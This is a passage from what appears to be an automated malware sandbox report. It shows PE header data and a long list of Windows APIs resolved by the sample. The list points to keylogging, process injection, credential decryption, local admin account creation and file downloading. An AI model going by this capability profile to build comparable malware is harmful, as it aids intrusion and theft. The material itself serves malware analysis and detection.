1063. },
1064. {
1065. "virtual_address": "0x00091000",
1066. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1067. "size": "0x0000799c"
1068. },
1069. {
1070. "virtual_address": "0x0003d520",
1071. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1072. "size": "0x0000001c"
1073. },
1074. {
1075. "virtual_address": "0x00000000",
1076. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1077. "size": "0x00000000"
1078. },
1079. {
1080. "virtual_address": "0x00000000",
1081. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1082. "size": "0x00000000"
1083. },
1084. {
1085. "virtual_address": "0x00000000",
1086. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1087. "size": "0x00000000"
1088. },
1089. {
1090. "virtual_address": "0x0003d540",
1091. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1092. "size": "0x00000040"
1093. },
1094. {
1095. "virtual_address": "0x00000000",
1096. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1097. "size": "0x00000000"
1098. },
1099. {
1100. "virtual_address": "0x00036000",
1101. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1102. "size": "0x00000254"
1103. },
1104. {
1105. "virtual_address": "0x00000000",
1106. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1107. "size": "0x00000000"
1108. },
1109. {
1110. "virtual_address": "0x00000000",
1111. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1112. "size": "0x00000000"
1113. },
1114. {
1115. "virtual_address": "0x00000000",
1116. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1117. "size": "0x00000000"
1118. }
1119. ],
1120. "exports": [],
1121. "guest_signers": {},
1122. "imphash": "c8503ab5366fc6e13552bba734a2de16",
1123. "icon_fuzzy": null,
1124. "icon": null,
1125. "pdbpath": null,
1126. "imported_dll_count": 34,
1127. "versioninfo": []
1128. }
1129. }
1130.  
1131. [*] Resolved APIs: [
1132. "kernel32.dll.InitializeCriticalSectionEx",
1133. "kernel32.dll.FlsAlloc",
1134. "kernel32.dll.FlsSetValue",
1135. "kernel32.dll.FlsGetValue",
1136. "kernel32.dll.LCMapStringEx",
1137. "advapi32.dll.EventActivityIdControl",
1138. "advapi32.dll.EventWriteTransfer",
1139. "kernel32.dll.InitializeSRWLock",
1140. "kernel32.dll.AcquireSRWLockExclusive",
1141. "kernel32.dll.AcquireSRWLockShared",
1142. "kernel32.dll.ReleaseSRWLockExclusive",
1143. "kernel32.dll.ReleaseSRWLockShared",
1144. "kernel32.dll.SortGetHandle",
1145. "kernel32.dll.SortCloseHandle",
1146. "kernel32.dll.SetFileInformationByHandle",
1147. "shell32.dll.SHGetFolderPathW",
1148. "kernel32.dll.GetModuleHandleW",
1149. "advapi32.dll.AddMandatoryAce",
1150. "ntmarta.dll.GetMartaExtensionInterface",
1151. "ws2_32.dll.accept",
1152. "ws2_32.dll.bind",
1153. "ws2_32.dll.closesocket",
1154. "ws2_32.dll.connect",
1155. "ws2_32.dll.getpeername",
1156. "ws2_32.dll.getsockname",
1157. "ws2_32.dll.getsockopt",
1158. "ws2_32.dll.ntohl",
1159. "ws2_32.dll.htonl",
1160. "ws2_32.dll.htons",
1161. "ws2_32.dll.inet_addr",
1162. "ws2_32.dll.inet_ntoa",
1163. "ws2_32.dll.ioctlsocket",
1164. "ws2_32.dll.listen",
1165. "ws2_32.dll.ntohs",
1166. "ws2_32.dll.recv",
1167. "ws2_32.dll.recvfrom",
1168. "ws2_32.dll.select",
1169. "ws2_32.dll.send",
1170. "ws2_32.dll.sendto",
1171. "ws2_32.dll.setsockopt",
1172. "ws2_32.dll.shutdown",
1173. "ws2_32.dll.socket",
1174. "ws2_32.dll.gethostbyname",
1175. "ws2_32.dll.gethostname",
1176. "ws2_32.dll.WSAIoctl",
1177. "ws2_32.dll.WSAGetLastError",
1178. "ws2_32.dll.WSASetLastError",
1179. "ws2_32.dll.WSAStartup",
1180. "ws2_32.dll.WSACleanup",
1181. "ws2_32.dll.__WSAFDIsSet",
1182. "ws2_32.dll.getaddrinfo",
1183. "ws2_32.dll.freeaddrinfo",
1184. "ws2_32.dll.getnameinfo",
1185. "ws2_32.dll.WSALookupServiceBeginW",
1186. "ws2_32.dll.WSALookupServiceNextW",
1187. "ws2_32.dll.WSALookupServiceEnd",
1188. "ws2_32.dll.WSANSPIoctl",
1189. "ws2_32.dll.WSAStringToAddressA",
1190. "ws2_32.dll.WSAStringToAddressW",
1191. "ws2_32.dll.WSAAddressToStringA",
1192. "dnsapi.dll.DnsGetProxyInformation",
1193. "dnsapi.dll.DnsFreeProxyName",
1194. "iphlpapi.dll.GetIpForwardTable2",
1195. "iphlpapi.dll.FreeMibTable",
1196. "iphlpapi.dll.GetIfEntry2",
1197. "iphlpapi.dll.ConvertInterfaceGuidToLuid",
1198. "iphlpapi.dll.ResolveIpNetEntry2",
1199. "iphlpapi.dll.GetIpNetEntry2",
1200. "shlwapi.dll.#260",
1201. "rasapi32.dll.RasConnectionNotificationW",
1202. "rasapi32.dll.RasEnumEntriesW",
1203. "rtutils.dll.TracePrintfExA",
1204. "sechost.dll.ConvertSidToStringSidW",
1205. "profapi.dll.#104",
1206. "shlwapi.dll.PathCanonicalizeW",
1207. "shlwapi.dll.PathRemoveFileSpecW",
1208. "shlwapi.dll.PathFindFileNameW",
1209. "sechost.dll.NotifyServiceStatusChangeA",
1210. "cryptbase.dll.SystemFunction036",
1211. "sensapi.dll.IsNetworkAlive",
1212. "rpcrt4.dll.RpcBindingFromStringBindingW",
1213. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
1214. "rpcrt4.dll.NdrClientCall2",
1215. "kernel32.dll.TerminateThread",
1216. "kernel32.dll.CreateThread",
1217. "kernel32.dll.WriteFile",
1218. "kernel32.dll.CreateFileW",
1219. "kernel32.dll.LoadLibraryW",
1220. "kernel32.dll.GetLocalTime",
1221. "kernel32.dll.GetCurrentThreadId",
1222. "kernel32.dll.GetCurrentProcessId",
1223. "kernel32.dll.ReadFile",
1224. "kernel32.dll.FindFirstFileA",
1225. "kernel32.dll.GetBinaryTypeW",
1226. "kernel32.dll.FindNextFileA",
1227. "kernel32.dll.GetFullPathNameA",
1228. "kernel32.dll.GetTempPathW",
1229. "kernel32.dll.GetPrivateProfileStringW",
1230. "kernel32.dll.CreateFileA",
1231. "kernel32.dll.GlobalAlloc",
1232. "kernel32.dll.GetCurrentDirectoryW",
1233. "kernel32.dll.SetCurrentDirectoryW",
1234. "kernel32.dll.LocalFree",
1235. "kernel32.dll.GetFileSize",
1236. "kernel32.dll.FreeLibrary",
1237. "kernel32.dll.WaitForSingleObject",
1238. "kernel32.dll.GetCurrentProcess",
1239. "kernel32.dll.WaitForMultipleObjects",
1240. "kernel32.dll.CreatePipe",
1241. "kernel32.dll.PeekNamedPipe",
1242. "kernel32.dll.DuplicateHandle",
1243. "kernel32.dll.SetEvent",
1244. "kernel32.dll.CreateProcessW",
1245. "kernel32.dll.CreateEventA",
1246. "kernel32.dll.GetModuleFileNameW",
1247. "kernel32.dll.LoadResource",
1248. "kernel32.dll.FindResourceW",
1249. "kernel32.dll.HeapFree",
1250. "kernel32.dll.LoadLibraryExW",
1251. "kernel32.dll.FindFirstFileW",
1252. "kernel32.dll.FindNextFileW",
1253. "kernel32.dll.SetFilePointer",
1254. "kernel32.dll.GetLogicalDriveStringsW",
1255. "kernel32.dll.DeleteFileW",
1256. "kernel32.dll.VirtualQuery",
1257. "kernel32.dll.GetDriveTypeW",
1258. "kernel32.dll.EnterCriticalSection",
1259. "kernel32.dll.LeaveCriticalSection",
1260. "kernel32.dll.InitializeCriticalSection",
1261. "kernel32.dll.DeleteCriticalSection",
1262. "kernel32.dll.CreateMutexA",
1263. "kernel32.dll.ReleaseMutex",
1264. "kernel32.dll.TerminateProcess",
1265. "kernel32.dll.OpenProcess",
1266. "kernel32.dll.CreateToolhelp32Snapshot",
1267. "kernel32.dll.Process32NextW",
1268. "kernel32.dll.Process32FirstW",
1269. "kernel32.dll.CreateProcessA",
1270. "kernel32.dll.SizeofResource",
1271. "kernel32.dll.VirtualProtect",
1272. "kernel32.dll.GetSystemDirectoryW",
1273. "kernel32.dll.LockResource",
1274. "kernel32.dll.GetWindowsDirectoryW",
1275. "kernel32.dll.IsWow64Process",
1276. "kernel32.dll.GetStartupInfoA",
1277. "kernel32.dll.Process32First",
1278. "kernel32.dll.WriteProcessMemory",
1279. "kernel32.dll.Process32Next",
1280. "kernel32.dll.GetWindowsDirectoryA",
1281. "kernel32.dll.VirtualProtectEx",
1282. "kernel32.dll.VirtualAllocEx",
1283. "kernel32.dll.CreateRemoteThread",
1284. "kernel32.dll.WinExec",
1285. "kernel32.dll.GetTempPathA",
1286. "kernel32.dll.GetCommandLineA",
1287. "kernel32.dll.GetModuleHandleA",
1288. "kernel32.dll.ExitProcess",
1289. "kernel32.dll.GetProcAddress",
1290. "kernel32.dll.LoadLibraryA",
1291. "kernel32.dll.GetProcessHeap",
1292. "kernel32.dll.HeapAlloc",
1293. "kernel32.dll.lstrcmpW",
1294. "kernel32.dll.GetTickCount",
1295. "kernel32.dll.lstrcpyW",
1296. "kernel32.dll.HeapReAlloc",
1297. "kernel32.dll.VirtualAlloc",
1298. "kernel32.dll.CopyFileW",
1299. "kernel32.dll.WideCharToMultiByte",
1300. "kernel32.dll.lstrcpyA",
1301. "kernel32.dll.Sleep",
1302. "kernel32.dll.MultiByteToWideChar",
1303. "kernel32.dll.lstrcatA",
1304. "kernel32.dll.lstrcmpA",
1305. "kernel32.dll.lstrlenA",
1306. "kernel32.dll.ExpandEnvironmentStringsW",
1307. "kernel32.dll.lstrlenW",
1308. "kernel32.dll.CloseHandle",
1309. "kernel32.dll.VirtualFree",
1310. "kernel32.dll.lstrcatW",
1311. "kernel32.dll.GetLastError",
1312. "kernel32.dll.SetLastError",
1313. "kernel32.dll.GetModuleFileNameA",
1314. "kernel32.dll.CreateDirectoryW",
1315. "kernel32.dll.GetComputerNameW",
1316. "user32.dll.MessageBoxA",
1317. "user32.dll.GetKeyState",
1318. "user32.dll.GetMessageA",
1319. "user32.dll.DispatchMessageA",
1320. "user32.dll.CreateWindowExW",
1321. "user32.dll.CallNextHookEx",
1322. "user32.dll.GetAsyncKeyState",
1323. "user32.dll.wsprintfW",
1324. "user32.dll.wsprintfA",
1325. "user32.dll.GetLastInputInfo",
1326. "user32.dll.GetWindowTextW",
1327. "user32.dll.RegisterClassW",
1328. "user32.dll.GetRawInputData",
1329. "user32.dll.TranslateMessage",
1330. "user32.dll.GetForegroundWindow",
1331. "user32.dll.DefWindowProcA",
1332. "user32.dll.RegisterRawInputDevices",
1333. "user32.dll.MapVirtualKeyA",
1334. "user32.dll.ToUnicode",
1335. "user32.dll.GetKeyNameTextW",
1336. "user32.dll.PostQuitMessage",
1337. "advapi32.dll.RegDeleteKeyA",
1338. "advapi32.dll.InitializeSecurityDescriptor",
1339. "advapi32.dll.RegDeleteKeyW",
1340. "advapi32.dll.RegEnumKeyExW",
1341. "advapi32.dll.RegOpenKeyExA",
1342. "advapi32.dll.RegOpenKeyExW",
1343. "advapi32.dll.RegQueryValueExW",
1344. "advapi32.dll.SetSecurityDescriptorDacl",
1345. "advapi32.dll.RegQueryInfoKeyW",
1346. "advapi32.dll.RegCloseKey",
1347. "advapi32.dll.OpenServiceW",
1348. "advapi32.dll.ChangeServiceConfigW",
1349. "advapi32.dll.QueryServiceConfigW",
1350. "advapi32.dll.EnumServicesStatusExW",
1351. "advapi32.dll.StartServiceW",
1352. "advapi32.dll.RegSetValueExW",
1353. "advapi32.dll.RegCreateKeyExA",
1354. "advapi32.dll.OpenSCManagerW",
1355. "advapi32.dll.CloseServiceHandle",
1356. "advapi32.dll.GetTokenInformation",
1357. "advapi32.dll.LookupAccountSidW",
1358. "advapi32.dll.FreeSid",
1359. "advapi32.dll.OpenProcessToken",
1360. "advapi32.dll.AllocateAndInitializeSid",
1361. "advapi32.dll.AdjustTokenPrivileges",
1362. "advapi32.dll.LookupPrivilegeValueW",
1363. "advapi32.dll.RegDeleteValueW",
1364. "advapi32.dll.RegSetValueExA",
1365. "advapi32.dll.RegCreateKeyExW",
1366. "advapi32.dll.RegQueryValueExA",
1367. "shell32.dll.ShellExecuteExA",
1368. "shell32.dll.ShellExecuteExW",
1369. "shell32.dll.SHGetSpecialFolderPathW",
1370. "shell32.dll.SHCreateDirectoryExW",
1371. "shell32.dll.ShellExecuteW",
1372. "urlmon.dll.URLDownloadToFileW",
1373. "ole32.dll.CoInitialize",
1374. "ole32.dll.CoCreateInstance",
1375. "ole32.dll.CoTaskMemFree",
1376. "ole32.dll.CoUninitialize",
1377. "shlwapi.dll.StrStrA",
1378. "shlwapi.dll.StrStrW",
1379. "shlwapi.dll.PathFindExtensionW",
1380. "shlwapi.dll.PathCombineA",
1381. "shlwapi.dll.PathFileExistsW",
1382. "shlwapi.dll.PathRemoveFileSpecA",
1383. "netapi32.dll.NetUserAdd",
1384. "netapi32.dll.NetLocalGroupAddMembers",
1385. "crypt32.dll.CryptStringToBinaryA",
1386. "crypt32.dll.CryptUnprotectData",
1387. "psapi.dll.GetModuleFileNameExW",
1388. "wininet.dll.InternetQueryDataAvailable",
1389. "wininet.dll.InternetOpenUrlW",
1390. "wininet.dll.InternetOpenW",
1391. "wininet.dll.InternetCloseHandle",
1392. "wininet.dll.InternetReadFile",
1393. "wininet.dll.InternetCheckConnectionW",
1394. "uxtheme.dll.ThemeInitApiHook",
1395. "user32.dll.IsProcessDPIAware",
1396. "wintrust.dll.WinVerifyTrust",
1397. "msdmo.dll.DMOEnum",
1398. "msdmo.dll.DMOGetTypes",
1399. "msdmo.dll.DMOGetName",
1400. "avicap32.dll.capGetDriverDescriptionW",
1401. "ole32.dll.CoTaskMemAlloc",
1402. "ole32.dll.CoInitializeEx",
1403. "ole32.dll.CreateBindCtx",
1404. "ole32.dll.CoGetApartmentType",
1405. "ole32.dll.CoRegisterInitializeSpy",
1406. "comctl32.dll.#236",
1407. "oleaut32.dll.#6",
1408. "ole32.dll.CoGetMalloc",
1409. "comctl32.dll.#320",
1410. "comctl32.dll.#324",
1411. "comctl32.dll.#323",
1412. "advapi32.dll.RegEnumKeyW",
1413. "oleaut32.dll.#2",
1414. "ole32.dll.CoRevokeInitializeSpy",
1415. "comctl32.dll.#388",
1416. "oleaut32.dll.#500",
1417. "rpcrt4.dll.RpcBindingFree",
1418. "advapi32.dll.UnregisterTraceGuids",
1419. "oleaut32.dll.#9",
1420. "comctl32.dll.#321",
1421. "shell32.dll.#66",
1422. "advapi32.dll.SetEntriesInAclW",
1423. "advapi32.dll.IsTextUnicode",
1424. "comctl32.dll.#332",
1425. "comctl32.dll.#338",
1426. "comctl32.dll.#339",
1427. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
1428. "shell32.dll.#102",
1429. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
1430. "comctl32.dll.#386",
1431. "apphelp.dll.ApphelpCheckShellObject",
1432. "comctl32.dll.#385",
1433. "comctl32.dll.#336",
1434. "comctl32.dll.#329",
1435. "comctl32.dll.#333",
1436. "ntdll.dll.RtlDllShutdownInProgress",
1437. "propsys.dll.PSCreateMemoryPropertyStore",
1438. "linkinfo.dll.CreateLinkInfoW",
1439. "user32.dll.IsCharAlphaW",
1440. "user32.dll.CharPrevW",
1441. "ntshrui.dll.GetNetResourceFromLocalPathW",
1442. "srvcli.dll.NetShareEnum",
1443. "cscapi.dll.CscNetApiGetInterface",
1444. "slc.dll.SLGetWindowsInformationDWORD",
1445. "linkinfo.dll.DestroyLinkInfo",
1446. "propsys.dll.PropVariantToBoolean",
1447. "ole32.dll.PropVariantClear",
1448. "cryptsp.dll.CryptAcquireContextW",
1449. "cryptsp.dll.CryptGenRandom",
1450. "cryptsp.dll.CryptReleaseContext",
1451. "advapi32.dll.RegEnumValueW",
1452. "kernel32.dll.QueryActCtxW",
1453. "shlwapi.dll.UrlIsW",
1454. "kernel32.dll.FlsFree",
1455. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
1456. "kernel32.dll.IsProcessorFeaturePresent",
1457. "msvcrt.dll._set_error_mode",
1458. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
1459. "kernel32.dll.FindActCtxSectionStringW",
1460. "kernel32.dll.GetSystemWindowsDirectoryW",
1461. "mscoree.dll.GetProcessExecutableHeap",
1462. "mscorwks.dll.DllGetClassObjectInternal",
1463. "mscorwks.dll.GetCLRFunction",
1464. "advapi32.dll.RegisterTraceGuidsW",
1465. "advapi32.dll.GetTraceLoggerHandle",
1466. "advapi32.dll.GetTraceEnableLevel",
1467. "advapi32.dll.GetTraceEnableFlags",
1468. "advapi32.dll.TraceEvent",
1469. "mscoree.dll.IEE",
1470. "mscorwks.dll.IEE",
1471. "mscoree.dll.GetStartupFlags",
1472. "mscoree.dll.GetHostConfigurationFile",
1473. "mscoree.dll.GetCORSystemDirectory",
1474. "ntdll.dll.RtlUnwind",
1475. "advapi32.dll.InitializeAcl",
1476. "advapi32.dll.AddAccessAllowedAce",
1477. "kernel32.dll.SetThreadStackGuarantee",
1478. "kernel32.dll.AddVectoredContinueHandler",
1479. "kernel32.dll.RemoveVectoredContinueHandler",
1480. "advapi32.dll.ConvertSidToStringSidW",
1481. "kernel32.dll.FlushProcessWriteBuffers",
1482. "kernel32.dll.GetWriteWatch",
1483. "kernel32.dll.ResetWriteWatch",
1484. "kernel32.dll.CreateMemoryResourceNotification",
1485. "kernel32.dll.QueryMemoryResourceNotification",
1486. "mscoree.dll._CorExeMain",
1487. "mscoree.dll._CorImageUnloading",
1488. "mscoree.dll._CorValidateImage",
1489. "oleaut32.dll.#149",
1490. "kernel32.dll.GetUserDefaultUILanguage",
1491. "ole32.dll.CoGetContextToken",
1492. "kernel32.dll.GetVersionExW",
1493. "kernel32.dll.GetFullPathNameW",
1494. "kernel32.dll.SetErrorMode",
1495. "kernel32.dll.GetFileAttributesExW",
1496. "version.dll.GetFileVersionInfoSizeW",
1497. "version.dll.GetFileVersionInfoW",
1498. "version.dll.VerQueryValueW",
1499. "kernel32.dll.lstrlen",
1500. "mscoree.dll.ND_RI2",
1501. "kernel32.dll.lstrcpy",
1502. "version.dll.VerLanguageNameW",
1503. "psapi.dll.EnumProcessModules",
1504. "psapi.dll.GetModuleInformation",
1505. "psapi.dll.GetModuleBaseNameW",
1506. "kernel32.dll.GetExitCodeProcess",
1507. "ntdll.dll.NtQuerySystemInformation",
1508. "user32.dll.EnumWindows",
1509. "user32.dll.GetWindowThreadProcessId",
1510. "user32.dll.GetWindow",
1511. "user32.dll.IsWindowVisible",
1512. "kernel32.dll.WerSetFlags",
1513. "kernel32.dll.SetThreadPreferredUILanguages",
1514. "kernel32.dll.GetThreadPreferredUILanguages",
1515. "kernel32.dll.GetUserDefaultLocaleName",
1516. "kernel32.dll.GetEnvironmentVariableW",
1517. "advapi32.dll.CryptAcquireContextA",
1518. "advapi32.dll.CryptReleaseContext",
1519. "advapi32.dll.CryptCreateHash",
1520. "advapi32.dll.CryptDestroyHash",
1521. "advapi32.dll.CryptHashData",
1522. "advapi32.dll.CryptGetHashParam",
1523. "advapi32.dll.CryptImportKey",
1524. "advapi32.dll.CryptExportKey",
1525. "advapi32.dll.CryptGenKey",
1526. "advapi32.dll.CryptGetKeyParam",
1527. "advapi32.dll.CryptDestroyKey",
1528. "advapi32.dll.CryptVerifySignatureA",
1529. "advapi32.dll.CryptSignHashA",
1530. "advapi32.dll.CryptGetProvParam",
1531. "advapi32.dll.CryptGetUserKey",
1532. "advapi32.dll.CryptEnumProvidersA",
1533. "cryptsp.dll.CryptAcquireContextA",
1534. "cryptsp.dll.CryptImportKey",
1535. "cryptsp.dll.CryptExportKey",
1536. "cryptsp.dll.CryptCreateHash",
1537. "cryptsp.dll.CryptHashData",
1538. "cryptsp.dll.CryptGetHashParam",
1539. "cryptsp.dll.CryptDestroyHash",
1540. "cryptsp.dll.CryptDestroyKey",
1541. "mscoree.dll.GetTokenForVTableEntry",
1542. "mscoree.dll.SetTargetForVTableEntry",
1543. "mscoree.dll.GetTargetForVTableEntry",
1544. "culture.dll.ConvertLangIdToCultureName",
1545. "ole32.dll.CoCreateGuid",
1546. "kernel32.dll.GetConsoleScreenBufferInfo",
1547. "kernel32.dll.LocalAlloc",
1548. "mscoree.dll.ND_RI4",
1549. "advapi32.dll.DuplicateTokenEx",
1550. "advapi32.dll.CheckTokenMembership",
1551. "kernel32.dll.GetConsoleTitleW",
1552. "kernel32.dll.SetConsoleTitleW",
1553. "kernel32.dll.SetConsoleCtrlHandler",
1554. "kernel32.dll.CreateEventW",
1555. "ntdll.dll.WinSqmIsOptedIn",
1556. "shfolder.dll.SHGetFolderPathW",
1557. "kernel32.dll.SetEnvironmentVariableW",
1558. "kernel32.dll.GetACP",
1559. "kernel32.dll.UnmapViewOfFile",
1560. "kernel32.dll.GetFileType",
1561. "kernel32.dll.GetSystemInfo",
1562. "kernel32.dll.SwitchToThread",
1563. "kernel32.dll.GlobalMemoryStatusEx",
1564. "secur32.dll.GetUserNameExW",
1565. "advapi32.dll.GetUserNameW",
1566. "advapi32.dll.RegisterEventSourceW",
1567. "advapi32.dll.DeregisterEventSource",
1568. "advapi32.dll.ReportEventW",
1569. "kernel32.dll.GetLogicalDrives",
1570. "kernel32.dll.GetVolumeInformationW",
1571. "mscorjit.dll.getJit",
1572. "kernel32.dll.GetStdHandle",
1573. "kernel32.dll.GetConsoleMode",
1574. "kernel32.dll.SetThreadUILanguage",
1575. "kernel32.dll.FindClose",
1576. "mscoree.dll.DllGetClassObject",
1577. "diasymreader.dll.DllGetClassObjectInternal",
1578. "kernel32.dll.GetConsoleOutputCP",
1579. "gdi32.dll.TranslateCharsetInfo",
1580. "kernel32.dll.SetConsoleTextAttribute",
1581. "kernel32.dll.WriteConsoleW",
1582. "mscoree.dll.CorExitProcess",
1583. "mscorwks.dll.CorExitProcess",
1584. "mscorwks.dll._CorDllMain",
1585. "kernel32.dll.CreateActCtxW",
1586. "kernel32.dll.AddRefActCtx",
1587. "kernel32.dll.ReleaseActCtx",
1588. "kernel32.dll.ActivateActCtx",
1589. "kernel32.dll.DeactivateActCtx",
1590. "kernel32.dll.GetCurrentActCtx",
1591. "netutils.dll.NetApiBufferFree",
1592. "rtutils.dll.TraceRegisterExA",
1593. "ntdll.dll.RtlGetVersion",
1594. "ntdll.dll.NtOpenKey",
1595. "ntdll.dll.wcscat_s",
1596. "ntdll.dll.wcscpy_s",
1597. "ntdll.dll.NtEnumerateKey",
1598. "ntdll.dll.RtlOpenCurrentUser",
1599. "ntdll.dll.RtlFreeHeap",
1600. "ntdll.dll.RtlAllocateHeap",
1601. "ntdll.dll.memcpy",
1602. "ntdll.dll.memset",
1603. "ntdll.dll.RtlEnterCriticalSection",
1604. "ntdll.dll.RtlLeaveCriticalSection",
1605. "ntdll.dll.RtlUnicodeToMultiByteN",
1606. "ntdll.dll.RtlMultiByteToUnicodeN",
1607. "ntdll.dll.RtlReleaseActivationContext",
1608. "ntdll.dll.RtlFindActivationContextSectionString",
1609. "ntdll.dll.RtlDeactivateActivationContextUnsafeFast",
1610. "ntdll.dll.RtlActivateActivationContextUnsafeFast",
1611. "ntdll.dll.wcstol",
1612. "ntdll.dll.NtQueryInformationProcess",
1613. "ntdll.dll.NtQuerySecurityObject",
1614. "ntdll.dll.NtSetSecurityObject",
1615. "ntdll.dll.RtlFreeUnicodeString",
1616. "ntdll.dll.RtlAnsiStringToUnicodeString",
1617. "ntdll.dll.RtlInitAnsiString",
1618. "ntdll.dll.RtlCreateUnicodeStringFromAsciiz",
1619. "ntdll.dll.RtlQueryInformationActiveActivationContext",
1620. "ntdll.dll._vsnwprintf",
1621. "ntdll.dll.NtVdmControl",
1622. "ntdll.dll.wcstoul",
1623. "ntdll.dll.NtOpenDirectoryObject",
1624. "ntdll.dll.NtDeleteValueKey",
1625. "ntdll.dll.NtSetValueKey",
1626. "ntdll.dll.NtCreateKey",
1627. "ntdll.dll.NtYieldExecution",
1628. "ntdll.dll.RtlIsThreadWithinLoaderCallout",
1629. "ntdll.dll._wcsicmp",
1630. "ntdll.dll._stricmp",
1631. "ntdll.dll.RtlGetIntegerAtom",
1632. "ntdll.dll.NtProtectVirtualMemory",
1633. "ntdll.dll.RtlRetrieveNtUserPfn",
1634. "ntdll.dll.RtlInitializeNtUserPfn",
1635. "ntdll.dll.RtlDeleteCriticalSection",
1636. "ntdll.dll.RtlInitializeCriticalSection",
1637. "ntdll.dll._allshr",
1638. "ntdll.dll.RtlUnicodeToMultiByteSize",
1639. "ntdll.dll._allmul",
1640. "ntdll.dll.NtCallbackReturn",
1641. "ntdll.dll._chkstk",
1642. "ntdll.dll.memmove",
1643. "ntdll.dll.NtQueryInformationToken",
1644. "ntdll.dll.NtOpenProcessToken",
1645. "ntdll.dll.NtOpenThreadToken",
1646. "ntdll.dll.RtlNtStatusToDosError",
1647. "ntdll.dll.CsrClientCallServer",
1648. "ntdll.dll.CsrFreeCaptureBuffer",
1649. "ntdll.dll.CsrCaptureMessageBuffer",
1650. "ntdll.dll.CsrAllocateCaptureBuffer",
1651. "ntdll.dll.RtlFreeSid",
1652. "ntdll.dll.RtlAllocateAndInitializeSid",
1653. "ntdll.dll.CsrAllocateMessagePointer",
1654. "ntdll.dll.RtlReAllocateHeap",
1655. "ntdll.dll.RtlRunDecodeUnicodeString",
1656. "ntdll.dll.RtlRunEncodeUnicodeString",
1657. "ntdll.dll.RtlGetThreadLangIdByIndex",
1658. "ntdll.dll.RtlSizeHeap",
1659. "ntdll.dll.strcpy_s",
1660. "ntdll.dll.sscanf_s",
1661. "ntdll.dll.strrchr",
1662. "ntdll.dll.RtlIsNameLegalDOS8Dot3",
1663. "ntdll.dll.wcsncat_s",
1664. "ntdll.dll.NtRaiseHardError",
1665. "ntdll.dll.RtlMultiByteToUnicodeSize",
1666. "ntdll.dll.RtlCheckRegistryKey",
1667. "ntdll.dll.LdrFlushAlternateResourceModules",
1668. "ntdll.dll.qsort",
1669. "ntdll.dll.iswspace",
1670. "ntdll.dll.wcsncpy_s",
1671. "ntdll.dll.wcsrchr",
1672. "ntdll.dll._alldiv",
1673. "ntdll.dll._wtoi",
1674. "ntdll.dll._aulldvrm",
1675. "ntdll.dll.NlsAnsiCodePage",
1676. "ntdll.dll.RtlImageNtHeader",
1677. "ntdll.dll.RtlSetLastWin32Error",
1678. "ntdll.dll.NtClose",
1679. "ntdll.dll.NtQueryValueKey",
1680. "ntdll.dll.swprintf_s",
1681. "ntdll.dll.RtlInitUnicodeString",
1682. "ntdll.dll.RtlUnicodeStringToInteger",
1683. "gdi32.dll.GetClipRgn",
1684. "gdi32.dll.ExtSelectClipRgn",
1685. "gdi32.dll.GetHFONT",
1686. "gdi32.dll.GetMapMode",
1687. "gdi32.dll.SetGraphicsMode",
1688. "gdi32.dll.GetClipBox",
1689. "gdi32.dll.CreateRectRgn",
1690. "gdi32.dll.CreateRectRgnIndirect",
1691. "gdi32.dll.SetLayout",
1692. "gdi32.dll.GetBoundsRect",
1693. "gdi32.dll.ExcludeClipRect",
1694. "gdi32.dll.PlayEnhMetaFile",
1695. "gdi32.dll.Ellipse",
1696. "gdi32.dll.CreateEllipticRgn",
1697. "gdi32.dll.GdiFixUpHandle",
1698. "gdi32.dll.CreatePen",
1699. "gdi32.dll.Rectangle",
1700. "gdi32.dll.GetTextCharacterExtra",
1701. "gdi32.dll.SetTextCharacterExtra",
1702. "gdi32.dll.GetCurrentObject",
1703. "gdi32.dll.GetViewportOrgEx",
1704. "gdi32.dll.SetViewportOrgEx",
1705. "gdi32.dll.PolyPatBlt",
1706. "gdi32.dll.CreateBrushIndirect",
1707. "gdi32.dll.SetBoundsRect",
1708. "gdi32.dll.CopyEnhMetaFileW",
1709. "gdi32.dll.CopyMetaFileW",
1710. "gdi32.dll.GetPaletteEntries",
1711. "gdi32.dll.CreatePalette",
1712. "gdi32.dll.SetPaletteEntries",
1713. "gdi32.dll.GetPixel",
1714. "gdi32.dll.ExtTextOutA",
1715. "gdi32.dll.GetTextCharsetInfo",
1716. "gdi32.dll.QueryFontAssocStatus",
1717. "gdi32.dll.GetCharWidthInfo",
1718. "gdi32.dll.GetCharWidthA",
1719. "gdi32.dll.GetTextFaceW",
1720. "gdi32.dll.GetCharABCWidthsA",
1721. "gdi32.dll.GetCharABCWidthsW",
1722. "gdi32.dll.SetBrushOrgEx",
1723. "gdi32.dll.CreateFontIndirectW",
1724. "gdi32.dll.EnumFontsW",
1725. "gdi32.dll.GetTextFaceAliasW",
1726. "gdi32.dll.GetTextMetricsW",
1727. "gdi32.dll.GetTextColor",
1728. "gdi32.dll.GdiGetCodePage",
1729. "gdi32.dll.GetTextCharset",
1730. "gdi32.dll.GetBkMode",
1731. "gdi32.dll.GetViewportExtEx",
1732. "gdi32.dll.GetWindowExtEx",
1733. "gdi32.dll.GdiGetCharDimensions",
1734. "gdi32.dll.GdiPrinterThunk",
1735. "gdi32.dll.GdiLoadType1Fonts",
1736. "gdi32.dll.GdiAddFontResourceW",
1737. "gdi32.dll.SaveDC",
1738. "gdi32.dll.OffsetWindowOrgEx",
1739. "gdi32.dll.RestoreDC",
1740. "gdi32.dll.ExtTextOutW",
1741. "gdi32.dll.GetDIBits",
1742. "gdi32.dll.CreateDIBSection",
1743. "gdi32.dll.SetStretchBltMode",
1744. "gdi32.dll.SelectPalette",
1745. "gdi32.dll.RealizePalette",
1746. "gdi32.dll.SetDIBits",
1747. "gdi32.dll.CreateDCW",
1748. "gdi32.dll.CreateDIBitmap",
